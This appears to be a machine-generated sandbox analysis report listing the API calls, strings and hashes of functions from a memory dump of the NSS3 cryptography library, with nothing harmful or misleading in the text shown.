Download Yara Rule

APIs

Part of subcall function 6C4CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C52F9C9,?,6C52F4DA,6C52F9C9,?,?,6C4F369A), ref: 6C4CCA7A
Part of subcall function 6C4CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4CCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C4DBE66), ref: 6C616E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C4DBE66), ref: 6C616E98
sqlite3_snprintf.NSS3(?,00000000,6C67AAF9,?,?,?,?,?,?,6C4DBE66), ref: 6C616EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C4DBE66), ref: 6C616ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C4DBE66), ref: 6C616EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C4DBE66), ref: 6C616F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C616F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C616F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C4DBE66), ref: 6C616FA6
sqlite3_snprintf.NSS3(?,00000000,6C67AAF9,00000000,?,?,?,?,?,?,?,6C4DBE66), ref: 6C616FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C616FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C616FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C617014
sqlite3_free.NSS3(00000000,?,?,?,?,6C4DBE66), ref: 6C61701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C4DBE66), ref: 6C617030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C4DBE66), ref: 6C61705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C4DBE66), ref: 6C617079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C617097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C4DBE66), ref: 6C6170A0

Strings

winGetTempname4, xrefs: 6C617046
winGetTempname5, xrefs: 6C617071
mz_etilqs_, xrefs: 6C616F18
winGetTempname2, xrefs: 6C6170C4
Pel, xrefs: 6C6170A8
winGetTempname1, xrefs: 6C61708F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pel$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-2258016319
Opcode ID: d2abf821615bbb491e69e3dbad0383afef6756cad5d1656db1a201b4ecc016c5
Instruction ID: 3aa18d77f6c2d8851f9854ba0606adc5d5df1d316ef04e5dbee9c1bbb3db5b23
Opcode Fuzzy Hash: d2abf821615bbb491e69e3dbad0383afef6756cad5d1656db1a201b4ecc016c5
Instruction Fuzzy Hash: 21517CB5B082116BE70096349C51FBB3626DBA230EF144538E80596FD1FB26D51EC2EF

Function 6C5A4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000,00000000,00000001), ref: 6C5A5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C5A5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5A505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C5A5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C5A50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2), ref: 6C5A50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5A50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5A50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A5153
free.MOZGLUE(?), ref: 6C5A516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5A517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5A5195

Strings

nss=, xrefs: 6C5A5083
name=, xrefs: 6C5A5057
parameters=, xrefs: 6C5A506B
library=, xrefs: 6C5A5043
config=, xrefs: 6C5A509B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: e9c77e1af7d9be71e646bf70dd71cd361d953602797d88f2113ffc8e3794c618
Instruction ID: cb64c078407ad8b6cd4a1c3ce49a578f6663ab042c4dc26d71ffb481fb0c2f9a
Opcode Fuzzy Hash: e9c77e1af7d9be71e646bf70dd71cd361d953602797d88f2113ffc8e3794c618
Instruction Fuzzy Hash: AA51FBB5A016066BEB00DF66DC41EAF37B8AF0624CF540420FC55E7741EB25E91ACBB6

Function 6C5A4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C594F51,00000000), ref: 6C5A4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C594F51,00000000), ref: 6C5A4C5B
PR_smprintf.NSS3(6C67AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C594F51,00000000), ref: 6C5A4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C594F51,00000000), ref: 6C5A4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5A4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5A4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5A4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C594F51,00000000), ref: 6C5A4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C594F51,00000000), ref: 6C5A4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C5A4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C5A4DA2
free.MOZGLUE(?), ref: 6C5A4DB9
free.MOZGLUE(00000000), ref: 6C5A4DCF

Strings

rootFlags, xrefs: 6C5A4D47
timeout, xrefs: 6C5A4C91
rust, xrefs: 6C5A4D22
ootT, xrefs: 6C5A4D1A
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C5A4D9D
slotFlags, xrefs: 6C5A4D34
%s,%s, xrefs: 6C5A4C4B
0x%08lx=[%s %s], xrefs: 6C5A4D80
any, xrefs: 6C5A4C96
every, xrefs: 6C5A4CA1

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 5bc32c9f574610501fe24b0ed2aeae94b73ea887a3a3213ce3bd4032d6dc5b14
Instruction ID: 7e8a798a5885eb19f654b2f762661031228c90fc6214c2562c99a3bdfa19a11b
Opcode Fuzzy Hash: 5bc32c9f574610501fe24b0ed2aeae94b73ea887a3a3213ce3bd4032d6dc5b14
Instruction Fuzzy Hash: 8D41B2B1900141BBDB129FD69C80ABF3A75AF9230CF544124EC1A1B702EB35D815C7EB

Function 6C586CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C586910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C586943
Part of subcall function 6C586910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C586957
Part of subcall function 6C586910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C586972
Part of subcall function 6C586910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C586983
Part of subcall function 6C586910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5869AA
Part of subcall function 6C586910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5869BE
Part of subcall function 6C586910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5869D2
Part of subcall function 6C586910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5869DF
Part of subcall function 6C586910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C586A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C586D8C
free.MOZGLUE(00000000), ref: 6C586DC5
free.MOZGLUE(?), ref: 6C586DD6
free.MOZGLUE(?), ref: 6C586DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C586E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C586E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C586E72
free.MOZGLUE(?), ref: 6C586EA7
free.MOZGLUE(?), ref: 6C586EC4
free.MOZGLUE(?), ref: 6C586ED5
free.MOZGLUE(00000000), ref: 6C586EE3
free.MOZGLUE(?), ref: 6C586EF4
free.MOZGLUE(?), ref: 6C586F08
free.MOZGLUE(00000000), ref: 6C586F35
free.MOZGLUE(?), ref: 6C586F44
free.MOZGLUE(?), ref: 6C586F5B
free.MOZGLUE(00000000), ref: 6C586F65

Part of subcall function 6C586C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C58781D,00000000,6C57BE2C,?,6C586B1D,?,?,?,?,00000000,00000000,6C58781D), ref: 6C586C40
Part of subcall function 6C586C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C58781D,?,6C57BE2C,?), ref: 6C586C58
Part of subcall function 6C586C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C58781D), ref: 6C586C6F
Part of subcall function 6C586C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C586C84
Part of subcall function 6C586C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C586C96
Part of subcall function 6C586C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C586CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C586F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C586FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C586FF4

Strings

+`Yl, xrefs: 6C586D0D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`Yl
API String ID: 1304971872-836630381
Opcode ID: f7d729610f28fdc44d1632773222c0d31bc77f6bc3f6ebd4cdc21d99afb15289
Instruction ID: fab32d969014172cc37da897235db648bf5cdea52e080cbcaafce64e48e4cdcb
Opcode Fuzzy Hash: f7d729610f28fdc44d1632773222c0d31bc77f6bc3f6ebd4cdc21d99afb15289
Instruction Fuzzy Hash: 0BB16EB0E123299FEF00DFA5DC85B9EBBB4AF05349F140024E815E7A40EB35E914CBA5

Function 6C531FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C532007
calloc.MOZGLUE(00000001,00000084), ref: 6C532077
calloc.MOZGLUE(00000001,0000002C), ref: 6C5320DF
TlsSetValue.KERNEL32(00000000), ref: 6C532188
PR_NewCondVar.NSS3 ref: 6C5321B7
calloc.MOZGLUE(00000001,00000084), ref: 6C53221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C5322C2
GetLastError.KERNEL32 ref: 6C5322CD
free.MOZGLUE(00000000), ref: 6C5322DD

Part of subcall function 6C530F00: PR_GetPageSize.NSS3(6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F1B
Part of subcall function 6C530F00: PR_NewLogModule.NSS3(clock,6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F25

Strings

X jl, xrefs: 6C53218E
T jl, xrefs: 6C532361

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID: T jl$X jl
API String ID: 3559583721-3113417791
Opcode ID: 1d555fa9f8d43a6cb3bf0f756f48a55a2bc6807d6842e0012f53ec6477b20a6e
Instruction ID: d81ee109414c61fac15d2639e2b318f773740de0f3eee90cee8805e4b006a58a
Opcode Fuzzy Hash: 1d555fa9f8d43a6cb3bf0f756f48a55a2bc6807d6842e0012f53ec6477b20a6e
Instruction Fuzzy Hash: 2A918BB0641B129FDB20DF7ADC89B5B7BF4BB06704F10442EE45ED6A41EB70A409CB99

Function 6C54DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C54DDDE

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C54DDF5

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C54DE34
PR_Now.NSS3 ref: 6C54DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C54DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C54DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C54DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C54DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C54DEF0
PR_smprintf.NSS3(6C67AAF9,(NULL) (Validity Unknown)), ref: 6C54DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C54DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C54DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C54DF33
free.MOZGLUE(00000000), ref: 6C54DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C54DF4B
free.MOZGLUE(00000000), ref: 6C54DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C54DF8E

Strings

{???}, xrefs: 6C54DE8B
%s%s, xrefs: 6C54DEEB
(NULL) (Validity Unknown), xrefs: 6C54DEFA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 9b981cdc8460db0b0ffc0a0f640663ed180158fdba341151c506f23eb636f82d
Instruction ID: e4088b1feaad19db2e6726acd6c99d180c51fc567b121b528b043e78234ab574
Opcode Fuzzy Hash: 9b981cdc8460db0b0ffc0a0f640663ed180158fdba341151c506f23eb636f82d
Instruction Fuzzy Hash: 2C51BFB1E00201ABDB10DF66DC41AAF7AF8AF95358F148429E809E7B01E731DD15CBE6

Function 6C582D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C582DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C582E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C582E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C582E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C554F1C,?,-00000001,00000000,?), ref: 6C582E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C554F1C,?,-00000001,00000000), ref: 6C582E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C582EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C582EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C582EF8
PR_Unlock.NSS3(?), ref: 6C582F62
TlsGetValue.KERNEL32 ref: 6C582F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C582F9E
PR_Unlock.NSS3(?), ref: 6C582FCA
TlsGetValue.KERNEL32 ref: 6C58301A
EnterCriticalSection.KERNEL32(?), ref: 6C58302E
PR_Unlock.NSS3(?), ref: 6C583066
PR_SetError.NSS3(00000000,00000000), ref: 6C583085
PR_Unlock.NSS3(?), ref: 6C5830EC
TlsGetValue.KERNEL32 ref: 6C58310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C583124
PR_Unlock.NSS3(?), ref: 6C58314C

Part of subcall function 6C569180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C59379E,?,6C569568,00000000,?,6C59379E,?,00000001,?), ref: 6C56918D
Part of subcall function 6C569180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C59379E,?,6C569568,00000000,?,6C59379E,?,00000001,?), ref: 6C5691A0

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

PR_SetError.NSS3(00000000,00000000), ref: 6C58316D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 11e05398e5f8b113498d8960312281d601e224e7520bdcf100dee0090313f042
Instruction ID: e31e3c04c2334ff81477ab54e20839a6b31c9ff384473710fb1f822ea436e666
Opcode Fuzzy Hash: 11e05398e5f8b113498d8960312281d601e224e7520bdcf100dee0090313f042
Instruction Fuzzy Hash: E1F19BB1D01229EFDF00DFA5DC84AAEBBB4BF49318F144169EC05A7711EB31A985CB91

Function 6C569FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C569FBE

Part of subcall function 6C542F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C542F0A
Part of subcall function 6C542F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C542F1D

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C56A015

Part of subcall function 6C581940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C58563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C58195C
Part of subcall function 6C581940: EnterCriticalSection.KERNEL32(?,?,6C58563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C55EAC5,00000001), ref: 6C581970
Part of subcall function 6C581940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C55EAC5,00000001,?,6C55CE9B,00000001,6C55EAC5), ref: 6C5819A0

PL_FreeArenaPool.NSS3(?), ref: 6C56A067
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C56A055

Part of subcall function 6C4C4C70: TlsGetValue.KERNEL32(?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4C97
Part of subcall function 6C4C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CB0
Part of subcall function 6C4C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CC9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56A07E
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C56A0B1
PL_FreeArenaPool.NSS3(?), ref: 6C56A0C7
